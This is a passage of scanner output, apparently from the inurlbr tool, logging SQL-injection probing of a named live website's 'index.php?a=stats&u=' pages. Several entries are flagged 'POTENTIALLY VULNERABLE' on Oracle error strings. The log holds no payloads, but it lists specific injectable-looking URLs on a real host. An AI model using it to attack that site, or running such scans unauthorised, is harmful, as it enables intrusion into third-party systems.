16469|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16470|_[ + ] More details:: / - / , ISP:
16471|_[ + ] Found:: UNIDENTIFIED
16472
16473 _[ - ]::--------------------------------------------------------------------------------------------------------------
16474|_[ + ] [ 11 / 100 ]-[00:27:23] [ ! ]
16475|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=107 ]
16476|_[ + ] Exploit::
16477|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16478|_[ + ] More details:: / - / , ISP:
16479|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16480|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16481
16482 _[ - ]::--------------------------------------------------------------------------------------------------------------
16483|_[ + ] [ 12 / 100 ]-[00:27:24] [ - ]
16484|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=5 ]
16485|_[ + ] Exploit::
16486|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16487|_[ + ] More details:: / - / , ISP:
16488|_[ + ] Found:: UNIDENTIFIED
16489
16490 _[ - ]::--------------------------------------------------------------------------------------------------------------
16491|_[ + ] [ 13 / 100 ]-[00:27:25] [ - ]
16492|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=2 ]
16493|_[ + ] Exploit::
16494|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16495|_[ + ] More details:: / - / , ISP:
16496|_[ + ] Found:: UNIDENTIFIED
16497
16498 _[ - ]::--------------------------------------------------------------------------------------------------------------
16499|_[ + ] [ 14 / 100 ]-[00:27:25] [ - ]
16500|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15 ]
16501|_[ + ] Exploit::
16502|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16503|_[ + ] More details:: / - / , ISP:
16504|_[ + ] Found:: UNIDENTIFIED
16505
16506 _[ - ]::--------------------------------------------------------------------------------------------------------------
16507|_[ + ] [ 15 / 100 ]-[00:27:26] [ - ]
16508|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=95 ]
16509|_[ + ] Exploit::
16510|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16511|_[ + ] More details:: / - / , ISP:
16512|_[ + ] Found:: UNIDENTIFIED
16513
16514 _[ - ]::--------------------------------------------------------------------------------------------------------------
16515|_[ + ] [ 16 / 100 ]-[00:27:27] [ - ]
16516|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=29 ]
16517|_[ + ] Exploit::
16518|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16519|_[ + ] More details:: / - / , ISP:
16520|_[ + ] Found:: UNIDENTIFIED
16521
16522 _[ - ]::--------------------------------------------------------------------------------------------------------------
16523|_[ + ] [ 17 / 100 ]-[00:27:27] [ - ]
16524|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=46 ]
16525|_[ + ] Exploit::
16526|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16527|_[ + ] More details:: / - / , ISP:
16528|_[ + ] Found:: UNIDENTIFIED
16529
16530 _[ - ]::--------------------------------------------------------------------------------------------------------------
16531|_[ + ] [ 18 / 100 ]-[00:27:28] [ - ]
16532|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66 ]
16533|_[ + ] Exploit::
16534|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16535|_[ + ] More details:: / - / , ISP:
16536|_[ + ] Found:: UNIDENTIFIED
16537
16538 _[ - ]::--------------------------------------------------------------------------------------------------------------
16539|_[ + ] [ 19 / 100 ]-[00:27:29] [ - ]
16540|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=50 ]
16541|_[ + ] Exploit::
16542|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16543|_[ + ] More details:: / - / , ISP:
16544|_[ + ] Found:: UNIDENTIFIED
16545
16546 _[ - ]::--------------------------------------------------------------------------------------------------------------
16547|_[ + ] [ 20 / 100 ]-[00:27:30] [ - ]
16548|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39 ]
16549|_[ + ] Exploit::
16550|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16551|_[ + ] More details:: / - / , ISP:
16552|_[ + ] Found:: UNIDENTIFIED
16553
16554 _[ - ]::--------------------------------------------------------------------------------------------------------------
16555|_[ + ] [ 21 / 100 ]-[00:27:30] [ - ]
16556|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=22 ]
16557|_[ + ] Exploit::
16558|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16559|_[ + ] More details:: / - / , ISP:
16560|_[ + ] Found:: UNIDENTIFIED
16561
16562 _[ - ]::--------------------------------------------------------------------------------------------------------------
16563|_[ + ] [ 22 / 100 ]-[00:27:31] [ - ]
16564|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75 ]
16565|_[ + ] Exploit::
16566|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16567|_[ + ] More details:: / - / , ISP:
16568|_[ + ] Found:: UNIDENTIFIED
16569
16570 _[ - ]::--------------------------------------------------------------------------------------------------------------
16571|_[ + ] [ 23 / 100 ]-[00:27:32] [ - ]
16572|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=31 ]
16573|_[ + ] Exploit::
16574|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16575|_[ + ] More details:: / - / , ISP:
16576|_[ + ] Found:: UNIDENTIFIED
16577
16578 _[ - ]::--------------------------------------------------------------------------------------------------------------
16579|_[ + ] [ 24 / 100 ]-[00:27:33] [ - ]
16580|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=61 ]
16581|_[ + ] Exploit::
16582|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16583|_[ + ] More details:: / - / , ISP:
16584|_[ + ] Found:: UNIDENTIFIED
16585
16586 _[ - ]::--------------------------------------------------------------------------------------------------------------
16587|_[ + ] [ 25 / 100 ]-[00:27:33] [ - ]
16588|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=64 ]
16589|_[ + ] Exploit::
16590|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16591|_[ + ] More details:: / - / , ISP:
16592|_[ + ] Found:: UNIDENTIFIED
16593
16594 _[ - ]::--------------------------------------------------------------------------------------------------------------
16595|_[ + ] [ 26 / 100 ]-[00:27:34] [ ! ]
16596|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=83 ]
16597|_[ + ] Exploit::
16598|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16599|_[ + ] More details:: / - / , ISP:
16600|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16601|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16602
16603 _[ - ]::--------------------------------------------------------------------------------------------------------------
16604|_[ + ] [ 27 / 100 ]-[00:27:35] [ - ]
16605|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=58 ]
16606|_[ + ] Exploit::
16607|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16608|_[ + ] More details:: / - / , ISP:
16609|_[ + ] Found:: UNIDENTIFIED
16610
16611 _[ - ]::--------------------------------------------------------------------------------------------------------------
16612|_[ + ] [ 28 / 100 ]-[00:27:36] [ - ]
16613|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=76 ]
16614|_[ + ] Exploit::
16615|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16616|_[ + ] More details:: / - / , ISP:
16617|_[ + ] Found:: UNIDENTIFIED
16618
16619 _[ - ]::--------------------------------------------------------------------------------------------------------------
16620|_[ + ] [ 29 / 100 ]-[00:27:36] [ - ]
16621|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=3 ]
16622|_[ + ] Exploit::
16623|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16624|_[ + ] More details:: / - / , ISP:
16625|_[ + ] Found:: UNIDENTIFIED
16626
16627 _[ - ]::--------------------------------------------------------------------------------------------------------------
16628|_[ + ] [ 30 / 100 ]-[00:27:37] [ - ]
16629|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=21 ]
16630|_[ + ] Exploit::
16631|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16632|_[ + ] More details:: / - / , ISP:
16633|_[ + ] Found:: UNIDENTIFIED
16634
16635 _[ - ]::--------------------------------------------------------------------------------------------------------------
16636|_[ + ] [ 31 / 100 ]-[00:27:38] [ ! ]
16637|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=34 ]
16638|_[ + ] Exploit::
16639|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16640|_[ + ] More details:: / - / , ISP:
16641|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16642|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16643
16644 _[ - ]::--------------------------------------------------------------------------------------------------------------
16645|_[ + ] [ 32 / 100 ]-[00:27:39] [ - ]
16646|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=49 ]
16647|_[ + ] Exploit::
16648|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16649|_[ + ] More details:: / - / , ISP:
16650|_[ + ] Found:: UNIDENTIFIED
16651
16652 _[ - ]::--------------------------------------------------------------------------------------------------------------
16653|_[ + ] [ 33 / 100 ]-[00:27:39] [ - ]
16654|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=6 ]
16655|_[ + ] Exploit::
16656|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16657|_[ + ] More details:: / - / , ISP:
16658|_[ + ] Found:: UNIDENTIFIED
16659
16660 _[ - ]::--------------------------------------------------------------------------------------------------------------
16661|_[ + ] [ 34 / 100 ]-[00:27:40] [ - ]
16662|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=51 ]
16663|_[ + ] Exploit::
16664|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16665|_[ + ] More details:: / - / , ISP:
16666|_[ + ] Found:: UNIDENTIFIED
16667
16668 _[ - ]::--------------------------------------------------------------------------------------------------------------
16669|_[ + ] [ 35 / 100 ]-[00:27:41] [ - ]
16670|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33 ]
16671|_[ + ] Exploit::
16672|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16673|_[ + ] More details:: / - / , ISP:
16674|_[ + ] Found:: UNIDENTIFIED
16675
16676 _[ - ]::--------------------------------------------------------------------------------------------------------------
16677|_[ + ] [ 36 / 100 ]-[00:27:41] [ - ]
16678|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=86 ]
16679|_[ + ] Exploit::
16680|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16681|_[ + ] More details:: / - / , ISP:
16682|_[ + ] Found:: UNIDENTIFIED
16683
16684 _[ - ]::--------------------------------------------------------------------------------------------------------------
16685|_[ + ] [ 37 / 100 ]-[00:27:42] [ - ]
16686|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30 ]
16687|_[ + ] Exploit::
16688|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16689|_[ + ] More details:: / - / , ISP:
16690|_[ + ] Found:: UNIDENTIFIED
16691
16692 _[ - ]::--------------------------------------------------------------------------------------------------------------
16693|_[ + ] [ 38 / 100 ]-[00:27:43] [ - ]
16694|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43 ]
16695|_[ + ] Exploit::
16696|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16697|_[ + ] More details:: / - / , ISP:
16698|_[ + ] Found:: UNIDENTIFIED
16699
16700 _[ - ]::--------------------------------------------------------------------------------------------------------------
16701|_[ + ] [ 39 / 100 ]-[00:27:43] [ - ]
16702|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=88 ]
16703|_[ + ] Exploit::
16704|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16705|_[ + ] More details:: / - / , ISP:
16706|_[ + ] Found:: UNIDENTIFIED
16707
16708 _[ - ]::--------------------------------------------------------------------------------------------------------------
16709|_[ + ] [ 40 / 100 ]-[00:27:44] [ - ]
16710|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=62 ]
16711|_[ + ] Exploit::
16712|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16713|_[ + ] More details:: / - / , ISP:
16714|_[ + ] Found:: UNIDENTIFIED
16715
16716 _[ - ]::--------------------------------------------------------------------------------------------------------------
16717|_[ + ] [ 41 / 100 ]-[00:27:45] [ - ]
16718|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=80 ]
16719|_[ + ] Exploit::
16720|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16721|_[ + ] More details:: / - / , ISP:
16722|_[ + ] Found:: UNIDENTIFIED
16723
16724 _[ - ]::--------------------------------------------------------------------------------------------------------------
16725|_[ + ] [ 42 / 100 ]-[00:27:46] [ - ]
16726|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=55 ]
16727|_[ + ] Exploit::
16728|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16729|_[ + ] More details:: / - / , ISP:
16730|_[ + ] Found:: UNIDENTIFIED
16731
16732 _[ - ]::--------------------------------------------------------------------------------------------------------------
16733|_[ + ] [ 43 / 100 ]-[00:27:47] [ - ]
16734|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=11 ]
16735|_[ + ] Exploit::
16736|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16737|_[ + ] More details:: / - / , ISP:
16738|_[ + ] Found:: UNIDENTIFIED
16739
16740 _[ - ]::--------------------------------------------------------------------------------------------------------------
16741|_[ + ] [ 44 / 100 ]-[00:27:47] [ - ]
16742|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14 ]
16743|_[ + ] Exploit::
16744|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16745|_[ + ] More details:: / - / , ISP:
16746|_[ + ] Found:: UNIDENTIFIED
16747
16748 _[ - ]::--------------------------------------------------------------------------------------------------------------
16749|_[ + ] [ 45 / 100 ]-[00:27:48] [ - ]
16750|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19 ]
16751|_[ + ] Exploit::
16752|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16753|_[ + ] More details:: / - / , ISP:
16754|_[ + ] Found:: UNIDENTIFIED
16755
16756 _[ - ]::--------------------------------------------------------------------------------------------------------------
16757|_[ + ] [ 46 / 100 ]-[00:27:49] [ - ]
16758|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=98 ]
16759|_[ + ] Exploit::
16760|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16761|_[ + ] More details:: / - / , ISP:
16762|_[ + ] Found:: UNIDENTIFIED
16763
16764 _[ - ]::--------------------------------------------------------------------------------------------------------------
16765|_[ + ] [ 47 / 100 ]-[00:27:50] [ - ]
16766|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=82 ]
16767|_[ + ] Exploit::
16768|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16769|_[ + ] More details:: / - / , ISP:
16770|_[ + ] Found:: UNIDENTIFIED
16771
16772 _[ - ]::--------------------------------------------------------------------------------------------------------------
16773|_[ + ] [ 48 / 100 ]-[00:27:50] [ - ]
16774|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=74 ]
16775|_[ + ] Exploit::
16776|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16777|_[ + ] More details:: / - / , ISP:
16778|_[ + ] Found:: UNIDENTIFIED
16779
16780 _[ - ]::--------------------------------------------------------------------------------------------------------------
16781|_[ + ] [ 49 / 100 ]-[00:27:51] [ - ]
16782|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100 ]
16783|_[ + ] Exploit::
16784|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16785|_[ + ] More details:: / - / , ISP:
16786|_[ + ] Found:: UNIDENTIFIED
16787
16788 _[ - ]::--------------------------------------------------------------------------------------------------------------
16789|_[ + ] [ 50 / 100 ]-[00:27:52] [ - ]
16790|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25 ]
16791|_[ + ] Exploit::
16792|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16793|_[ + ] More details:: / - / , ISP:
16794|_[ + ] Found:: UNIDENTIFIED
16795
16796 _[ - ]::--------------------------------------------------------------------------------------------------------------
16797|_[ + ] [ 51 / 100 ]-[00:27:52] [ - ]
16798|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=augustagrenier ]
16799|_[ + ] Exploit::
16800|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16801|_[ + ] More details:: / - / , ISP:
16802|_[ + ] Found:: UNIDENTIFIED
16803
16804 _[ - ]::--------------------------------------------------------------------------------------------------------------
16805|_[ + ] [ 52 / 100 ]-[00:27:53] [ ! ]
16806|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=56 ]
16807|_[ + ] Exploit::
16808|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16809|_[ + ] More details:: / - / , ISP:
16810|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16811|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16812
16813 _[ - ]::--------------------------------------------------------------------------------------------------------------
16814|_[ + ] [ 53 / 100 ]-[00:27:54] [ - ]
16815|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=17 ]
16816|_[ + ] Exploit::
16817|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16818|_[ + ] More details:: / - / , ISP:
16819|_[ + ] Found:: UNIDENTIFIED
16820
16821 _[ - ]::--------------------------------------------------------------------------------------------------------------
16822|_[ + ] [ 54 / 100 ]-[00:27:55] [ - ]
16823|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=26 ]
16824|_[ + ] Exploit::
16825|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16826|_[ + ] More details:: / - / , ISP:
16827|_[ + ] Found:: UNIDENTIFIED
16828
16829 _[ - ]::--------------------------------------------------------------------------------------------------------------
16830|_[ + ] [ 55 / 100 ]-[00:27:56] [ - ]
16831|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=44 ]
16832|_[ + ] Exploit::
16833|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16834|_[ + ] More details:: / - / , ISP:
16835|_[ + ] Found:: UNIDENTIFIED
16836
16837 _[ - ]::--------------------------------------------------------------------------------------------------------------
16838|_[ + ] [ 56 / 100 ]-[00:27:57] [ - ]
16839|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=60 ]
16840|_[ + ] Exploit::
16841|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16842|_[ + ] More details:: / - / , ISP:
16843|_[ + ] Found:: UNIDENTIFIED
16844
16845 _[ - ]::--------------------------------------------------------------------------------------------------------------
16846|_[ + ] [ 57 / 100 ]-[00:27:58] [ - ]
16847|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=45 ]
16848|_[ + ] Exploit::
16849|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16850|_[ + ] More details:: / - / , ISP:
16851|_[ + ] Found:: UNIDENTIFIED
16852
16853 _[ - ]::--------------------------------------------------------------------------------------------------------------
16854|_[ + ] [ 58 / 100 ]-[00:27:58] [ - ]
16855|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=16 ]
16856|_[ + ] Exploit::
16857|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16858|_[ + ] More details:: / - / , ISP:
16859|_[ + ] Found:: UNIDENTIFIED
16860
16861 _[ - ]::--------------------------------------------------------------------------------------------------------------
16862|_[ + ] [ 59 / 100 ]-[00:28:00] [ - ]
16863|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23 ]
16864|_[ + ] Exploit::
16865|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16866|_[ + ] More details:: / - / , ISP:
16867|_[ + ] Found:: UNIDENTIFIED
16868
16869 _[ - ]::--------------------------------------------------------------------------------------------------------------
16870|_[ + ] [ 60 / 100 ]-[00:28:02] [ - ]
16871|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20 ]
16872|_[ + ] Exploit::
16873|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16874|_[ + ] More details:: / - / , ISP:
16875|_[ + ] Found:: UNIDENTIFIED
16876
16877 _[ - ]::--------------------------------------------------------------------------------------------------------------
16878|_[ + ] [ 61 / 100 ]-[00:28:03] [ - ]
16879|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=106 ]
16880|_[ + ] Exploit::
16881|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16882|_[ + ] More details:: / - / , ISP:
16883|_[ + ] Found:: UNIDENTIFIED
16884
16885 _[ - ]::--------------------------------------------------------------------------------------------------------------
16886|_[ + ] [ 62 / 100 ]-[00:28:04] [ ! ]
16887|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=28 ]
16888|_[ + ] Exploit::
16889|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16890|_[ + ] More details:: / - / , ISP:
16891|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16892|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16893
16894 _[ - ]::--------------------------------------------------------------------------------------------------------------
16895|_[ + ] [ 63 / 100 ]-[00:28:05] [ - ]
16896|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=34 ]
16897|_[ + ] Exploit::
16898|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16899|_[ + ] More details:: / - / , ISP:
16900|_[ + ] Found:: UNIDENTIFIED
16901
16902 _[ - ]::--------------------------------------------------------------------------------------------------------------
16903|_[ + ] [ 64 / 100 ]-[00:28:05] [ - ]
16904|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=9 ]
16905|_[ + ] Exploit::
16906|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16907|_[ + ] More details:: / - / , ISP:
16908|_[ + ] Found:: UNIDENTIFIED
16909
16910 _[ - ]::--------------------------------------------------------------------------------------------------------------
16911|_[ + ] [ 65 / 100 ]-[00:28:06] [ - ]
16912|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59 ]
16913|_[ + ] Exploit::
16914|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16915|_[ + ] More details:: / - / , ISP:
16916|_[ + ] Found:: UNIDENTIFIED
16917
16918 _[ - ]::--------------------------------------------------------------------------------------------------------------
16919|_[ + ] [ 66 / 100 ]-[00:28:07] [ - ]
16920|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=62 ]
16921|_[ + ] Exploit::
16922|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16923|_[ + ] More details:: / - / , ISP:
16924|_[ + ] Found:: UNIDENTIFIED
16925
16926 _[ - ]::--------------------------------------------------------------------------------------------------------------
16927|_[ + ] [ 67 / 100 ]-[00:28:08] [ - ]
16928|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=77 ]
16929|_[ + ] Exploit::
16930|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16931|_[ + ] More details:: / - / , ISP:
16932|_[ + ] Found:: UNIDENTIFIED
16933
16934 _[ - ]::--------------------------------------------------------------------------------------------------------------
16935|_[ + ] [ 68 / 100 ]-[00:28:09] [ - ]
16936|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47 ]
16937|_[ + ] Exploit::
16938|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16939|_[ + ] More details:: / - / , ISP:
16940|_[ + ] Found:: UNIDENTIFIED
16941
16942 _[ - ]::--------------------------------------------------------------------------------------------------------------
16943|_[ + ] [ 69 / 100 ]-[00:28:09] [ - ]
16944|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=4 ]
16945|_[ + ] Exploit::
16946|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16947|_[ + ] More details:: / - / , ISP:
16948|_[ + ] Found:: UNIDENTIFIED
16949
16950 _[ - ]::--------------------------------------------------------------------------------------------------------------
16951|_[ + ] [ 70 / 100 ]-[00:28:10] [ - ]
16952|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=52 ]
16953|_[ + ] Exploit::
16954|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16955|_[ + ] More details:: / - / , ISP:
16956|_[ + ] Found:: UNIDENTIFIED
16957
16958 _[ - ]::--------------------------------------------------------------------------------------------------------------
16959|_[ + ] [ 71 / 100 ]-[00:28:11] [ - ]
16960|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=65&go=1 ]
16961|_[ + ] Exploit::
16962|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16963|_[ + ] More details:: / - / , ISP:
16964|_[ + ] Found:: UNIDENTIFIED
16965
16966 _[ - ]::--------------------------------------------------------------------------------------------------------------
16967|_[ + ] [ 72 / 100 ]-[00:28:12] [ - ]
16968|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100&all_reviews=1 ]
16969|_[ + ] Exploit::
16970|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16971|_[ + ] More details:: / - / , ISP:
16972|_[ + ] Found:: UNIDENTIFIED
16973
